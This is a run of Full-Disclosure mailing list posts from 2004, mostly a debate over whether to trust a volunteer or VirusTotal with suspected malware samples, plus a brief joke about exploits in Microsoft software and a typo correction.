"Entrust", just what exactly are you thinking you might be giving away? > > > I'm also rather suspicious of your promotion of Virus Total. Hispasec, > > as far as I can tell (Spanish being something I have to have translated > > via online services), has no antivirus or similar product of its own, > > I do not necessarily trust this company or their service. Having said > that, if they produced their own Anti-Virus package, to put other > vendors scanning engines in a publicly available service would either > be damaging to their business, or considered anti-competitive. > > > yet it has set up, and some folk seem to be promoting, what is > > effectively a sample collection mechanism. I've also heard vague > > rumblings that Hispasec/Virus Total does not have suitable licenses for > > at least some of the scanners used in its service (and strongly suspect > > that several of the AV vendors whose products are currently used would > > not allow their products to be licensed for use in a service of the > > kind Virus Total offers anyway because it paints a rather disturbing > > trust picture -- "You can trust me because I can run a virus > > scanner..."). > > Again, you suspect allot of deception here, and while it is of course > possible you are correct, I have yet to see this ever done in > practice. Samples of non-data carrying viruses or trojans are of > little use to anyone other than Anti-Virus firms, as it is easy to > collect raw source for most if one is so inclined. > I agree that it is unlikely they have sufficient client licenses to > provide such a service; however I can see that there are a great deal > of arguments in law about how their case may be won. They may for > example only be required to carry one license, they could argue that > they are simply allowing users to deliberately infect their systems, > and making portions of the logs publicly available. > > If there are viruses which commonly copy target system data, or > sensitive data into their binaries at the present time (I imagine the > mention of this deception may well spring at least one such virus) > then I apologise that I am not aware of it. If the report of the virus > name in question is accurate (which IIRC it has been now verified by > someone else) then the binary is not carrying sensitive data. > > Having said all of the above, your concern is not mis-placed, and if > you feel uncomfortable with any such possibility of giving away a > minor amount of data, then certainly make good your freedom and choose > not to do so. > > There is always no need for aggressive statement of suspicion, which > you are close to here. While I understand aggression due to anger, I > am concerned that one should not get angry at someone offering them a > service merely because one is suspicious of them. What if the offer of > help is entirely genuine? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Security & Obscurity: First-time attacks and lawyer jokes
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Georgi Guninski wrote:
| for the sake of the argument, let's assume there are as low as 10^6
bugs in m$
| warez. to take over the world (and in particular any target thereof) a kid
| needs as low as 10^2 or even 10 or even 1 exploits.
| any "real world" ('tm' of god) analogies?
|
Shooting a fish in a barrel?
Honza Vlach
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
iD8DBQFBOBZ7SVzvioqX7FkRAgY0AKDXB2eMeUhQczqVcmca3LksUF1ppACeIySB
UKOz4R/Id+Ey4YiYszBXJb8=
=2kVZ
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] win2kup2date.exe ?
Ahem, *blush* > Be cautios with your words Should be, as you probably guessed: "Be cautious with your words". Damn typos. -- Peace. ~G On Fri, 3 Sep 2004 01:58:24 -0400, Über GuidoZ <[EMAIL PROTECTED]> wrote: > Hey, the man asked for help, so I offered it. Simple as that... I'm a > helpful guy, it's what makes me tick. Dedicated my life to a > non-profit organization that helps the average consumer FOR FREE with > security consulting, technical support, and personal privacy. Not > because I'm trying to collect anything. Not because I'm trying to get > a foothold on any business. Simply for the fact that I remember how > frustrated and helpless I was when I didn't understand anything. I try > to make sure others don't have to suffer the same fate. > > Be cautios with your words. You never know who you may be speaking to, > or how they will take it. General advise; not necessarily relating to > this situation beyond common courtesy. > > As for VirusTotal.com, to be honest I have never cared why they > provide the service they do. I also could care less if they are > keeping copies of the viruses that are sent to them... they are > available all over the Internet. (Google it...) When someone has an > unknown malware EXE and they need a quick way to identify it to fix a > problem, why not go with what works? Their business practices isn't > any business of mine. The fact that they answer the question I ask, > however, IS. > > A little respect is all I ever ask. =) > > -- > Peace. ~G > > On Fri, 03 Sep 2004 11:19:41 +1200, Nick FitzGerald > > > <[EMAIL PROTECTED]> wrote: > > Über GuidoZ wrote: > > > > > ... If you want to email me a copy of it, I'll > > > rip it apart and see what can be seen. > > > > And world plus dog should entrust you with such material because??? > > > > > P.S. Send it to [...] - it's my "catch all" for > > > virus/unknown files. Just be sure to ZIP it up or else the web host > > > won't let it through. Otherwise I have disabled all checks/scan. > > > Downloads directly to a secured Linux box. > > > > That's all very nice, but alone, far from the makings of someone to > > entrust arbitrary, suspected malware samples to. > > > > I'm also rather suspicious of your promotion of Virus Total. Hispasec, > > as far as I can tell (Spanish being something I have to have translated > > via online services), has no antivirus or similar product of its own, > > yet it has set up, and some folk seem to be promoting, what is > > effectively a sample collection mechanism. I've also heard vague > > rumblings that Hispasec/Virus Total does not have suitable licenses for > > at least some of the scanners used in its service (and strongly suspect > > that several of the AV vendors whose products are currently used would > > not allow their products to be licensed for use in a service of the > > kind Virus Total offers anyway because it paints a rather disturbing > > trust picture -- "You can trust me because I can run a virus > > scanner..."). > > > > Regards, > > > > Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
